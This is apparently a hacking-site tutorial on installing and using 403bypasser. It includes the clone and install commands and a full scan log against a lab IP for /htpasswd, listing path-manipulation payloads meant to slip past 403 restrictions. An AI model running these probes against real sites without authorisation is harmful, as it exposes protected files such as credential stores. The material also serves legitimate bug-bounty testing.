403bypasser – Bypass 403 Restrictions Directory

Bypass 403 – Hi guys, we have a fantastic tool for you all that can reward you if you are a bug hunter and looking for a bug in any web application. 403bypasser automates techniques used to bypass access control restrictions on a landing page. In this tutorial, we will show you the installation and some uses of this tool. Bypass 403
Access control is a core component of data security that controls who can access and use company data and resources. This access control technique is also applied to web applications. The development of certain websites is done with high security. Although we can bypass this access control using automated tools. Bypass 403
The 403bypasser tool automates the techniques to bypass access control restrictions on target pages. 403bypasser tool performs brute force enforcement of possible directories in the target domain that can be bypassed. The 403bypasser is developed in python and is available on GitHub. 403bypasser is an open-source tool and is free to use. 403bypasser supports scanning multiple URLs simultaneously. We can save the results to a text file for further use.
- Also Read: Display & View Images in Termux Terminal using Termimage
- Also Read: Share Termux Shell to Windows CMD Using SSH Server
- Also Read: Installing GHOST Framework in Termux | No Root
- Also Read: How to Install & Use Maltego In Termux a Complete Guide
✅ Installation :
Step_1: Use the following command to install python3 and pip or install the tool on your Kali Linux operating system.
┌──(root💀OnlineHacking)-[~]
└─# git clone https://github.com/yunemse48/403bypasser.git
Cloning into '403bypasser'...
remote: Enumerating objects: 217, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 217 (delta 21), reused 16 (delta 16), pack-reused 190
Receiving objects: 100% (217/217), 71.25 KiB | 694.00 KiB/s, done.
Resolving deltas: 100% (101/101), done.
┌──(root💀OnlineHacking)-[~]
└─# cd 403bypasser
┌──(root💀OnlineHacking)-[~/403bypasser]
└─# sudo pip3 install -r requirements.txt
Step_2: Now move to the tool directory using the following command. You need to move in the directory to run the tool.
Step 3: You are in the 403Bypasser directory. Now you need to install the 403Bypasser dependency using the following command.
Step_4: All dependencies have been installed in your Kali Linux OS. Now use the following command to run the tool and check the help section.
Now we can control this tool using “python“.
┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -h
usage: 403bypasser.py [-h] [-u URL] [-U URLLIST] [-d [DIR]] [-D DIRLIST]
options:
-h, --help show this help message and exit
-u URL, --url URL single URL to scan, ex: http://example.com
-U URLLIST, --urllist URLLIST
path to list of URLs, ex: urllist.txt
-d [DIR], --dir [DIR]
Single directory to scan, ex: /admin
-D DIRLIST, --dirlist DIRLIST
path to list of directories, ex: dirlist.txt
┌──(root💀OnlineHacking)-[~/403bypasser]
└─#
💥 Using :
As we know that sometimes we are not able to find the sensitive files of the web server, then it works, in that case, to find the given sensitive files using different metacharacters.
As you can see, it successfully found the sensitive file by appending the extension in front.
This bad configuration can easily reward you because there are some juicy things in it.
You can try to access the sensitive file location by following the same procedure as in the previous step.
┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -u http://10.0.3.15 -d htpasswd
______________________________________________________________________________
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/
__ __ ____ _____ __
/ // / / __ \__ // /_ __ ______ ____ ______________ _____ ____
/ // /_/ / / //_ </ __ \/ / / / __ \/ __ `/ ___/ ___/ _ \/ ___/
/__ __ / /_/ /__/ / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / /
/_/ \____/____/_.___/\__, / .___/\__,_/____/____/\___/_/
/____/_/
______________________________________________________________________________
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/
=========== Target URL: http://10.0.3.15 Target Path: /htpasswd ===========
POST --> http://10.0.3.15/htpasswd STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd STATUS: 404 SIZE: 271
GET --> http://10.0.3.15//htpasswd// STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/./htpasswd/. STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/%2e/htpasswd STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/ STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd..;/ STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/..;/ STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%20 STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%09 STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%00 STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.json STATUS: 200 SIZE: 27
GET --> http://10.0.3.15/htpasswd.css STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.html STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd? STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?? STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd??? STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?testparam STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd# STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd#test STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/. STATUS: 404 SIZE: 271
💢 Use 403bypasser Tool :
Example_1: One URL to scan
Example_2: Path to a list of URLs
Usage :
Argument | Description | Examples | Note |
---|---|---|---|
-u | single URL to scan | http://example.com or Ip | All these example usages are interpreted in the same way |
-U | path to list of URLs | ./urllist.txt, ../../urllist.txt, etc. | Just provide the path where the file is located 🙂 |
-d | single directory to scan | admin or /admin or admin/ or /admin/ | All these example usages are interpreted in the same way |
-D | path to list of directories | ./dirlist.txt, ../../dirlist.txt, etc. | Just provide the path where the file is located 🙂 |
Usage_1: python3 403bypasser.py -u https://exampIe.com -d /secret
Usage_2: python3 403bypasser.py -u https://exampIe.com -D dirlist.txt
Usage_3: python3 403bypasser.py -U urllist.txt -d /secret
Usage_4: python3 403bypasser.py -U urllist.txt -D dirlist.txt